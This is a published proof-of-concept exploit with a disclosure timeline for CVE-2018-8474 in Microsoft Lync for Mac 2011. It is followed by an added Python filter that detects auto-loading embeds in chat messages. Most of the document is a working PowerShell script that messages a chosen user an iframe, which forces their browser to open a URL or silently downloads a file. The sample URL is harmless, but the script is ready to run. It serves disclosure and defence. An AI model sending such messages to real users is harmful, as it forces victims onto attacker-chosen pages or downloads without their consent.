# Exploit Title: Microsoft Lync for Mac 2011 Injection Forced Browsing/Download
# Author: @nyxgeek - TrustedSec
# Date: 2018-03-20
# Vendor Homepage: microsoft.com
# Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=36517
# CVE: CVE-2018-8474
# Version: Lync:Mac 2011 14.4.3, likely earlier versions
# Tested on: Lync:Mac 2011 14.4.3 (170308)

# Description:
# Force browsing or download via embedded iframe in a chat window. No user
# interaction required. When the iframe contains a web site URL, a new browser
# window of the default browser will open with the URL.
# If the URL is a file, it will download it automatically if it is a permitted
# file type (e.g., zip)

# A write-up can be found at:
# https://www.trustedsec.com/2018/09/full-disclosure-microsoft-lync-for-mac-2011-susceptible-to-forced-browsing-download-attack/

# Requirements: Originating machine needs Lync 2013 SDK installed
# (https://www.microsoft.com/en-us/download/details.aspx?id=36824)

# Timeline of Disclosure:
#
# 07/18/2017 - Reported issue to Microsoft
# 11/22/2017 - Microsoft has reproduced problem
# 03/07/2018 - Microsoft replies that they have decided not to fix, but gave
# their blessing for disclosure

#target user
$target = "user@domain"
$message = "<iframe src='https://www.youtube.com/watch?v=9Rnr70wCQSA'></iframe>"

if (-not (Get-Module -Name Microsoft.Lync.Model)) {
    try {
        # you may need to change the location of this DLL
        Import-Module "C:\Program Files\Microsoft Office\Office15\LyncSDK\Assemblies\Desktop\Microsoft.Lync.Model.dll" -ErrorAction Stop
    } catch {
        Write-Warning "Microsoft.Lync.Model not available, download and install the Lync 2013 SDK http://www.microsoft.com/en-us/download/details.aspx?id=36824"
    }
}

# Connect to the local Skype process
try {
    $client = [Microsoft.Lync.Model.LyncClient]::GetClient()
} catch {
    Write-Host "`nYou need to have Skype open and signed in first"
    break
}

#Start Conversation
$msg = New-Object "System.Collections.Generic.Dictionary[Microsoft.Lync.Model.Conversation.InstantMessageContentType, String]"

#Add the Message
$msg.Add(1,$message)

# Add the contact URI
try {
    $contact = $client.ContactManager.GetContactByUri($target)
} catch {
    Write-Host "`nFailed to lookup Contact"$target
    break
}

# Create a conversation
$convo = $client.ConversationManager.AddConversation()
$convo.AddParticipant($contact) | Out-Null

# Set the message mode as IM
$imModality = $convo.Modalities[1]

# Send the message
$imModality.BeginSendMessage($msg, $null, $imModality) | Out-Null

# End the Convo to suppress the UI
$convo.End() | Out-Null

Write-Host "Sent the following message to "$target":`n"$message
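
A defensive counterpart to the behaviour described above, added here as an example and not part of the original advisory or TrustedSec's code: a Python check that a chat gateway or client could run on an inbound IM body before rendering, flagging auto-loading embeds and classifying the target as navigation or download. It goes beyond the iframe case on the page; the extra tag names, the `.zip`-only extension set, and all function and class names are assumptions.

```python
from html import escape
from html.parser import HTMLParser
from posixpath import splitext
from urllib.parse import urlparse

# Assumption: elements a renderer may load without a click (the page shows iframe only).
AUTO_LOAD_TAGS = {"iframe", "frame", "embed", "object"}
# Assumption: extensions treated as downloads; the advisory names zip as one example.
DOWNLOAD_EXTS = {".zip"}


class EmbedFinder(HTMLParser):
    """Collects (tag, url, kind) for each auto-loading element in a message body."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so <IFRAME SRC=...> matches.
        if tag not in AUTO_LOAD_TAGS:
            return
        attr = dict(attrs)
        url = attr.get("src") or attr.get("data") or ""
        try:
            ext = splitext(urlparse(url).path)[1].lower()
        except ValueError:  # malformed URL: still report the embed
            ext = ""
        kind = "download" if ext in DOWNLOAD_EXTS else "navigation"
        self.findings.append((tag, url, kind))


def inspect_message(body):
    """Return every auto-loading embed found in an IM body (empty list if clean)."""
    finder = EmbedFinder()
    finder.feed(body)
    finder.close()
    return finder.findings


def render_safe(body):
    """Pass clean bodies through; escape flagged ones so the markup shows as text."""
    return escape(body) if inspect_message(body) else body
```
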